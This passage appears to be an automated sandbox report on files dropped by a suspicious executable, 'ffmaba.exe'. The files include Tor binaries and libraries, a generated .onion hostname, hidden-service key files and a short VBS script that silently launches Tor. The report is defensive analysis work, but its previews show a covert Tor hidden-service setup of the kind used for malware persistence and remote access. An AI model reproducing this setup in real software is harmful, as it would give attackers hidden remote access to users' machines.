                                                                          SHA-256:5347DCBF1BE0D63ACCE745341864CC2C5BAB82249D745BB745CC26A0ECEB40EA
                                                                          SHA-512:A2D36134C52D8916BC50A72DB3CF0344F7379A17B22220C41D3B4113B2D865F4470D6BC3B06C1E1779B6838212FF399461B5CDD602875E74F0130A4B595D12F2
                                                                          Malicious:false
                                                                          Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-07-23 13:00:00.fresh-until 2024-07-23 14:00:00.valid-until 2024-07-23 16:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthD

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\geoip

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):3722717
                                                                          Entropy (8bit):4.010901367141998
                                                                          Encrypted:false
                                                                          SSDEEP:49152:Pa4vmG4rp0QBJycSB2mTZJlZYofSWeT9P9utTTCbvaSa+:0
                                                                          MD5:7AD60C3E9CDB9992B1C2F5D79701B812
                                                                          SHA1:B3A9770171D3060502B7F13C0618BE109B92DF6C
                                                                          SHA-256:0AA9299BFF0A8AE1B1FEC6B6C96C551CC2FC31E213BD11EA9F414D571CC8C9D3
                                                                          SHA-512:0939E3F5333395B995F35F0B635FEA0089BAEF9817ECE6FB54BFEB3DC51DC48A6369605C5EAEC53EC2C37247789C707FC02579EA3DE2A53F5813222542DC9460
                                                                          Malicious:false
                                                                          Preview:# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Thu, 12 Aug 2021 05:51:15 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.16777216,16777471,AU.16777472,16778239,CN.16778240,16779263,AU.16779264,16781311,CN.16781312,16785407,JP.16785408,16793599,CN.16793600,16809983,JP.16809984,16842751,TH.16842752,16843007,CN.16843008,16843263,AU.16843264,16859135,CN.16859136,16875519,JP.16875520,16908287,TH.16908288,16909055,CN.16909056,16909311,AU.16909312,16941055,CN.16941056,16973823,TH.16973824,17039359,CN.17039360,17039615,AU.17039616,17072127,CN.17072128,17104895,TH.17104896,17170431,JP.17170432,17301503,IN.17301504,17367039

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\geoip6

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):5379114
                                                                          Entropy (8bit):3.102923211242497
                                                                          Encrypted:false
                                                                          SSDEEP:24576:iNjMD2TFE4TisycmlLikLPTOyjWGYoOxMUV5TnL/rg1ThnL/P7dDb3z7LAq7v80P:x
                                                                          MD5:69AAC4453831397E074682E38B1C6F99
                                                                          SHA1:410B70763FC675B3622264FAA0FC67B78FDE30C2
                                                                          SHA-256:F90A98373DBCBA676A38C2E98DE16DADB2D44FC3D5389C74E43A84C2F16DB81B
                                                                          SHA-512:91C274C1DCEBAAD1CA0530CD560A51D39B3842126F6F317806AF562DCBC701BAF49E2B3AA2504C187DE3A41ED13005E92A6E511DBC0708974379CE79258F8CD1
                                                                          Malicious:false
                                                                          Preview:# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Thu, 12 Aug 2021 05:51:15 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.2001::,2001:0:ffff:ffff:ffff:ffff:ffff:ffff,??.2001:4:112::,2001:4:112:ffff:ffff:ffff:ffff:ffff,??.2001:200::,2001:200:134:ffff:ffff:ffff:ffff:ffff,JP.2001:200:135::,2001:200:135:ffff:ffff:ffff:ffff:ffff,US.2001:200:136::,2001:200:179:ffff:ffff:ffff:ffff:ffff,JP.2001:200:17a::,2001:200:17b:ffff:ffff:ffff:ffff:ffff,US.2001:200:17c::,2001:200:ffff:ffff:ffff:ffff:ffff:ffff,JP.2001:201::,2001:207:ffff:ffff:ffff:ffff:ffff:ffff,AU.2001:208::,2001:208:ffff:ffff:ffff:ffff:ffff:ffff,SG.2001:209::,2001:21

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\host\hostname (copy)

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):4.671973149067329
                                                                          Encrypted:false
                                                                          SSDEEP:3:ZlUnVxagdmKOYY9dRcvn:kmgdmKOJZcv
                                                                          MD5:97FE17356A83653904C59CF66A71711D
                                                                          SHA1:8C06E0700A1EF9B29FAC091D715C811A427BF8E7
                                                                          SHA-256:545B5D1BD08844B292C4458FA6B675D9AF965EB4B05634F0033C4160109234FF
                                                                          SHA-512:D481B09E396BFC7CE15858D723175A9AA66D12EC731B08334B302BD3BE3896ED713AACDDD3CB8C87AA104BAF1A18973BC049337AB974D626FA152A08AC79B80F
                                                                          Malicious:false
                                                                          Preview:lfrtflatnytdw3qe65i2u4h6dfzh2nv37v3gf26n25bokro6r6awkxid.onion..

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\host\hostname.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):4.671973149067329
                                                                          Encrypted:false
                                                                          SSDEEP:3:ZlUnVxagdmKOYY9dRcvn:kmgdmKOJZcv
                                                                          MD5:97FE17356A83653904C59CF66A71711D
                                                                          SHA1:8C06E0700A1EF9B29FAC091D715C811A427BF8E7
                                                                          SHA-256:545B5D1BD08844B292C4458FA6B675D9AF965EB4B05634F0033C4160109234FF
                                                                          SHA-512:D481B09E396BFC7CE15858D723175A9AA66D12EC731B08334B302BD3BE3896ED713AACDDD3CB8C87AA104BAF1A18973BC049337AB974D626FA152A08AC79B80F
                                                                          Malicious:false
                                                                          Preview:lfrtflatnytdw3qe65i2u4h6dfzh2nv37v3gf26n25bokro6r6awkxid.onion..

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\host\hs_ed25519_public_key (copy)

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):5.402114648336088
                                                                          Encrypted:false
                                                                          SSDEEP:3:16GGRAAYlXXJigGhY6vA+fn:XuAAYlXXJigKLVn
                                                                          MD5:207A74CCC8483CFA1CAA462087AA215F
                                                                          SHA1:C284DA64D1659181451F8FA0681EF20C01E8AA08
                                                                          SHA-256:5C22987DE652C061396D77B61698E51B62FB860FB47274BCD13ADD7563ACC810
                                                                          SHA-512:92A8D4252CAB0505CAE18DAA40A7B1BBD2929396C2F3034253547BC8559B94347F84CEC8FCD85EDF4ED8BA1218EB0B9E6EA6CA95D5FA60F918495DA117D31E8E
                                                                          Malicious:false
                                                                          Preview:== ed25519v1-public: type0 ==...Yc2..n&;n..Q.p..r}6..vb...B.E..

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\host\hs_ed25519_public_key.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):5.402114648336088
                                                                          Encrypted:false
                                                                          SSDEEP:3:16GGRAAYlXXJigGhY6vA+fn:XuAAYlXXJigKLVn
                                                                          MD5:207A74CCC8483CFA1CAA462087AA215F
                                                                          SHA1:C284DA64D1659181451F8FA0681EF20C01E8AA08
                                                                          SHA-256:5C22987DE652C061396D77B61698E51B62FB860FB47274BCD13ADD7563ACC810
                                                                          SHA-512:92A8D4252CAB0505CAE18DAA40A7B1BBD2929396C2F3034253547BC8559B94347F84CEC8FCD85EDF4ED8BA1218EB0B9E6EA6CA95D5FA60F918495DA117D31E8E
                                                                          Malicious:false
                                                                          Preview:== ed25519v1-public: type0 ==...Yc2..n&;n..Q.p..r}6..vb...B.E..

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\host\hs_ed25519_secret_key (copy)

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):96
                                                                          Entropy (8bit):6.019705599611885
                                                                          Encrypted:false
                                                                          SSDEEP:3:16GGx6qAYlfY3Bjv/WIU5frzKYuo+O9Pnd:XwAYlw3Bjv/WBfi4d
                                                                          MD5:4B3646A38CA8023A4FDB2328537D9C76
                                                                          SHA1:89CA6E2BE3B3555205ABF43248088C5A5F14942E
                                                                          SHA-256:6190545B0E16BEF305B9145D0283F274808A8A8F626899C1CA5DD02EF4132F96
                                                                          SHA-512:1DCD195E7B46D194051E4464C1213997411B279453EB00CECABB3788BA7824648DDEC03CE856327994067B148B1534CA67A6203B8C9D49A5B9D1BF53A71B198D
                                                                          Malicious:false
                                                                          Preview:== ed25519v1-secret: type0 ==....(...,..]..>.B+...9.0..-.O...jzz.\...c....Z..4a....?.z..u...j.8

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\host\hs_ed25519_secret_key.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):96
                                                                          Entropy (8bit):6.019705599611885
                                                                          Encrypted:false
                                                                          SSDEEP:3:16GGx6qAYlfY3Bjv/WIU5frzKYuo+O9Pnd:XwAYlw3Bjv/WBfi4d
                                                                          MD5:4B3646A38CA8023A4FDB2328537D9C76
                                                                          SHA1:89CA6E2BE3B3555205ABF43248088C5A5F14942E
                                                                          SHA-256:6190545B0E16BEF305B9145D0283F274808A8A8F626899C1CA5DD02EF4132F96
                                                                          SHA-512:1DCD195E7B46D194051E4464C1213997411B279453EB00CECABB3788BA7824648DDEC03CE856327994067B148B1534CA67A6203B8C9D49A5B9D1BF53A71B198D
                                                                          Malicious:false
                                                                          Preview:== ed25519v1-secret: type0 ==....(...,..]..>.B+...9.0..-.O...jzz.\...c....Z..4a....?.z..u...j.8

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dll

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3655740
                                                                          Entropy (8bit):6.4622987038409
                                                                          Encrypted:false
                                                                          SSDEEP:98304:gNuOztMCl6beK03dnwzje1UZecMioeWhuw6N7hpupY1CPwDv3uFfJUz5XlgDzCRK:AHaCl6beK03dnwzje1wecboeWhuZN7hq
                                                                          MD5:6D48D76A4D1C9B0FF49680349C4D28AE
                                                                          SHA1:1BB3666C16E11EFF8F9C3213B20629F02D6A66CB
                                                                          SHA-256:3F08728C7A67E4998FBDC7A7CB556D8158EFDCDAF0ACF75B7789DCCACE55662D
                                                                          SHA-512:09A4FD7B37CF52F6A0C3BB0A7517E2D2439F4AF8E03130AED3296D7448585EA5E3C0892E1E1202F658EF2D083CE13C436779E202C39620A70A17B026705C65C9
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: 7h2eHzSa61.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: SqhpdzwbpB.exe, Detection: malicious, Browse
                                                                          • Filename: jtfCFDmLdX.exe, Detection: malicious, Browse
                                                                          • Filename: vSlVoTPrmP.exe, Detection: malicious, Browse
                                                                          • Filename: RO67OsrIWi.exe, Detection: malicious, Browse
                                                                          • Filename: NxrkCS4fDD.exe, Detection: malicious, Browse
                                                                          • Filename: 7WOfaFsPQv.exe, Detection: malicious, Browse
                                                                          • Filename: Rgi3BxJNQJ.exe, Detection: malicious, Browse
                                                                          • Filename: 2y1JbYuXUD.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........rW.....!...#......&..B........... ....@k.........................`/......p8...@... .......................#.......%......0&......................@&.,.............................".....................D.%..............................text...x...........................`..`.data........ ....... ..............@.`..rdata..(Q...0...R...0..............@.`@.bss.....A....#.......................`..edata........#.......#.............@.0@.idata........%.......%.............@.0..CRT....,.....&.......%.............@.0..tls......... &.......%.............@.0..rsrc........0&.......%.............@.0..reloc..,....@&.......%.............@.0B/4...........0'.......&.............@.@B/19..........@'.......&.............@..B/31.....\V...P,..X....+.............@..B/45...........,.......+.............@..B/57.....\.....-.......,.............@.0B/70...........-.......,.

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dll

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1144039
                                                                          Entropy (8bit):6.2640955652625285
                                                                          Encrypted:false
                                                                          SSDEEP:24576:IdsuH81r7Lfml/aakxLDHGlOhRz7xiOStGX8PxUS2mmAWW:6uL0a3xLDHG8hRz7xiOzX8PxUfmt
                                                                          MD5:A3BF8E33948D94D490D4613441685EEE
                                                                          SHA1:75ED7F6E2855A497F45B15270C3AD4AED6AD02E2
                                                                          SHA-256:91C812A33871E40B264761F1418E37EBFEB750FE61CA00CBCBE9F3769A8BF585
                                                                          SHA-512:C20EF2EFCACB5F8C7E2464DE7FDE68BF610AB2E0608FF4DAED9BF676996375DB99BEE7E3F26C5BD6CCA63F9B2D889ED5460EC25004130887CD1A90B892BE2B28
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: 7h2eHzSa61.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: SqhpdzwbpB.exe, Detection: malicious, Browse
                                                                          • Filename: jtfCFDmLdX.exe, Detection: malicious, Browse
                                                                          • Filename: vSlVoTPrmP.exe, Detection: malicious, Browse
                                                                          • Filename: RO67OsrIWi.exe, Detection: malicious, Browse
                                                                          • Filename: NxrkCS4fDD.exe, Detection: malicious, Browse
                                                                          • Filename: 7WOfaFsPQv.exe, Detection: malicious, Browse
                                                                          • Filename: Rgi3BxJNQJ.exe, Detection: malicious, Browse
                                                                          • Filename: 2y1JbYuXUD.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!...#...........................h.................................B....@... ..........................Y......4............................P..X&..........................dj......................L................................text...............................`.P`.data...............................@.`..rdata..P...........................@.`@.bss..................................`..edata...Y.......Z...p..............@.0@.idata..4...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..X&...P...(..................@.0B/4..................................@.@B/19.....;".......$..................@..B/31......Y.......Z...4..............@..B/45.......... ......................@..B/57..................z..............@.0B/70.....(....0......................@..B/81.....H]...@...^......

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_core-2-1-7.dll

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):975436
                                                                          Entropy (8bit):6.216593168771383
                                                                          Encrypted:false
                                                                          SSDEEP:24576:aYz/U9dYQv6wbSVliNPzIqENbtFXrFKtSRvwwfu:1Za6wbSV4NPzIqENTXrFKtIvG
                                                                          MD5:686C6A9DA6767287BF2E2126574FAFEA
                                                                          SHA1:2B0BE53C4AD4B67ECDFDCD97A717DE5A617F9EF0
                                                                          SHA-256:ABDC8CFB39D1431A1E740CF9DB2BBD604CDB7A4ED79E7E0A68D814E32A296164
                                                                          SHA-512:3CDE56FF25E53A9A04B5459113C89B8562C01B0F93E39C56BD6536824488F4F9347929935056012ADAA4982CBB8A39B61CE2F17CF92ECF02295AB1A922CD4DD4
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........-......!...#.J...................`....0n................................F.....@... .........................i<...0...............................`..............................$........................2..H............................text...TI.......J..................`.P`.data........`.......P..............@.`..rdata..<V...p...X...T..............@.`@.bss..................................`..edata..i<.......>..................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B/4..................................@.@B/19.................................@..B/31.....}W.......X...8..............@..B/45.....p...........................@..B/57..................z..............@.0B/70.......... ......................@..B/81......[...0...\......

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_extra-2-1-7.dll

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):683256
                                                                          Entropy (8bit):6.173131714749706
                                                                          Encrypted:false
                                                                          SSDEEP:12288:39gDBeIO2+MMF5lDeXfzxjgtSMStxEX6eg5bTCubl:meh2JMF5lqXfzxUbStyX6eKnCubl
                                                                          MD5:070F988B98E9717BBD5E870A4F8C1611
                                                                          SHA1:17FB4C990C13A4FB0A2181FE139D3515FF8D96F6
                                                                          SHA-256:9DEB6F1776DB51FA7E4E89AD2779A9F07E9F22FCB5E24481FAA291D2D27E43FE
                                                                          SHA-512:C83D793BBE26E0297F9726B32CAD5BE3F92DBC36717C143FF7D55B7BD7BB20324FD86594BC626A374252656C3EE187FA4DCA4C3933FE19952894042B2127A6FD
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!...#.$...................@.....d......................................@... .................................$...............................P...........................D~.......................................................text...$".......$..................`.P`.data...4....@.......*..............@.`..rdata..\A...P...B...,..............@.`@.bss.... .............................`..edata........... ...n..............@.0@.idata..$...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..P...........................@.0B/4......P....0......................@.@B/19.....0+...@...,..................@..B/31.....z?...p...@..................@..B/45..................0..............@..B/57.....t....`......................@.0B/70.................................@..B/81.....D...............

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\libgcc_s_sjlj-1.dll

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1095418
                                                                          Entropy (8bit):6.031576353424405
                                                                          Encrypted:false
                                                                          SSDEEP:12288:yWgvC0/HECgnPAPQPtPTPSP7PaadQ2XDPcP8PwPhP5PhP4aEPzPaPugAPnPFgtPD:tmC0/yKX1JzUBDLTl3Ibzz2rnuNY
                                                                          MD5:BD40FF3D0CE8D338A1FE4501CD8E9A09
                                                                          SHA1:3AAE8C33BF0EC9ADF5FBF8A361445969DE409B49
                                                                          SHA-256:EBDA776A2A353F8F0690B1C7706B0CDAFF3D23E1618515D45E451FC19440501C
                                                                          SHA-512:404FB3C107006B832B8E900F6E27873324CD0A7946CDCCF4FFEEA365A725892D929E8B160379AF9782BCD6CFEB4C3C805740E21280B42BB2CE8F39F26792E5A1
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........k......!...#.:...j...............P.....m.........................@............@... .................................................................d............................f......................................................text....8.......:..................`.P`.data...(....P.......@..............@.0..rdata.......`.......B..............@.`@.bss..................................0..edata...............T..............@.0@.idata...............`..............@.0..CRT....,............f..............@.0..tls.................h..............@.0..reloc..d............j..............@.0B/4......H............p..............@.@B/19.....t...........................@..B/31.....a............,..............@..B/45......g...p...h..................@..B/57.....\).......*...Z..............@.0B/70.................................@..B/81.....=....0..........

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssl-1_1.dll

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1107348
                                                                          Entropy (8bit):6.190031039194072
                                                                          Encrypted:false
                                                                          SSDEEP:24576:JOscL0k1lOI5732OutG3c1RcJq09LrXfu1UYaP3KHl20tzVBm1X6yD50H4Ine3/p:0scn5COutG3cQJtu1UYaP3KHs0tzVBmP
                                                                          MD5:945D225539BECC01FBCA32E9FF6464F0
                                                                          SHA1:A614EB470DEFEAB01317A73380F44DB669100406
                                                                          SHA-256:C697434857A039BF27238C105BE0487A0C6C611DD36CB1587C3C6B3BF582718A
                                                                          SHA-512:409F8F1E6D683A3CBE7954BCE37013316DEE086CDBD7ECDA88ACB5D94031CFF6166A93B641875116327151823CCE747BCF254C0185E0770E2B74B7C5E067BC4A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........I......!...#....."............... .....j.........................`.......K....@... .........................3@......|>...0.......................@...C...........................M.......................................................text...............................`.P`.data....,... ......................@.`..rdata.......P.......>..............@.`@.bss....X....p........................`..edata..3@.......B...Z..............@.0@.idata..|>.......@..................@.0..CRT....,...........................@.0..tls......... ......................@.0..rsrc........0......................@.0..reloc...C...@...D..................@.0B/4...................(..............@.@B/19.............. ...,..............@..B/31......7.......8...L..............@..B/45.................................@..B/57.................................@.0B/70.....................

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssp-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):252871
                                                                          Entropy (8bit):5.911389655551474
                                                                          Encrypted:false
                                                                          SSDEEP:6144:DZRBjnF7ModBbDCdcJfstxzeo51aU6grhog4MmwYq55:1BJlDSkYzzugduM5
                                                                          MD5:B77328DA7CEAD5F4623748A70727860D
                                                                          SHA1:13B33722C55CCA14025B90060E3227DB57BF5327
                                                                          SHA-256:46541D9E28C18BC11267630920B97C42F104C258B55E2F62E4A02BCD5F03E0E7
                                                                          SHA-512:2F1BD13357078454203092ED5DDC23A8BAA5E64202FBA1E4F98EACF1C3C184616E527468A96FF36D98B9324426DDDFA20B62B38CF95C6F5C0DC32513EBACE9E2
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........z.........!...#.....2...............0.....h.........................@......q.....@... ......................`..i....p...............................................................@.......................p...............................text...............................`.P`.data...$....0......."..............@.0..rdata..h....@.......$..............@.0@.bss....d....P........................0..edata..i....`.......*..............@.0@.idata.......p.......,..............@.0..CRT....,............2..............@.0..tls.................4..............@.0..reloc...............6..............@.0B/4...................8..............@.@B/19..................<..............@..B/31.................................@..B/45......'.......(...0..............@..B/57..................X..............@.0B/70..................`..............@..B/81..................d..

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\libwinpthread-1.dll

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):525113
                                                                          Entropy (8bit):6.099620174174238
                                                                          Encrypted:false
                                                                          SSDEEP:12288:/+Pm3Yv9CUauItmEz8HHLOA/TqlDCQdz9bVMPxTivFg:2Pm3Yv9CUauItmEz8HHLOA/TqluQdz9c
                                                                          MD5:19D7CC4377F3C09D97C6DA06FBABC7DC
                                                                          SHA1:3A3BA8F397FB95ED5DF22896B2C53A326662FCC9
                                                                          SHA-256:228FCFE9ED0574B8DA32DD26EAF2F5DBAEF0E1BD2535CB9B1635212CCDCBF84D
                                                                          SHA-512:23711285352CDEC6815B5DD6E295EC50568FAB7614706BC8D5328A4A0B62991C54B16126ED9E522471D2367B6F32FA35FEB41BFA77B3402680D9A69F53962A4A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X..W......!...#.....6.....................d.................................)....@... ...................................... ..P....................0......................................................t...8............................text.............................. .P`.data...H...........................@.0..rdata..4...........................@.0@.bss..................................0..edata..............................@.0@.idata..............................@.0..CRT....0...........................@.0..tls................................@.0..rsrc...P.... ......................@.0..reloc.......0......................@.0B/4...........@......................@.@B/19.....$....P......................@..B/31.....|D...@...F..................@..B/45.................................@..B/57.....$0...0...2..................@.0B/70..........p..........

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-bg.vbs

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):172
                                                                          Entropy (8bit):4.939646411880318
                                                                          Encrypted:false
                                                                          SSDEEP:3:jaPFEm8nByK2qQZnmRdZj4I5xKpRZxHFmGZj4I5xKpRWSsMPjaPOUC:j6NqEK2dnmR5+Rl5+RBseFUC
                                                                          MD5:C066AE688069850E35E30EBA9C0FB4CA
                                                                          SHA1:75901F0E3E8488523B901FC3F7A5F21ED307E0E5
                                                                          SHA-256:816D5F7CD7C8B6AC18BD37E018A78FE95E6EE3A70EA232431C450FB4447CBF4A
                                                                          SHA-512:1A2D40EA4D759B39DE82BD3BDCF86464CA8C31F2896BCC521ED4251FC7293949930EC43B06D1742B7B71CE0FAA8D78338D7557B41B6ADC2B895263A837E326F7
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:Set WshShell = CreateObject("WScript.Shell") ..WshShell.Run("""C:\Program Files (x86)\Tor\tor-real.exe"" -f ""C:\Program Files (x86)\Tor\torrc"""),0..Set WshShell = Nothing

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-gencert.exe

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1055744
                                                                          Entropy (8bit):6.430797346246855
                                                                          Encrypted:false
                                                                          SSDEEP:12288:U0msFd0wHnfgHtubcrJfeFDmh3CUrDVX:jOwHnfgHtuQr92mh3BV
                                                                          MD5:29E72F9FA2E399A00EB31A355289D082
                                                                          SHA1:0DB2462212F9B4ABBAD9B48B87248447C28EE2F2
                                                                          SHA-256:5C380138810D0CD5407095F22E6F515AFCCD3615F40D627774FFF59865251336
                                                                          SHA-512:028472E6D4BC4CBDB948A9366B900C3EB0D631142CD1601BD98945AF70B9C5ADE2033063051F88025C341351E26DA5628FB263BFC4F09CAFD861BFC7D1F6CB76
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................................................@..........................`.......$....@... .............................................................. ..4>...........................h..........................4............................text...............................`.P`.data...(...........................@.`..rdata..0N.......P...j..............@.`@.bss..................................`..idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..4>... ...@..................@.0B................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
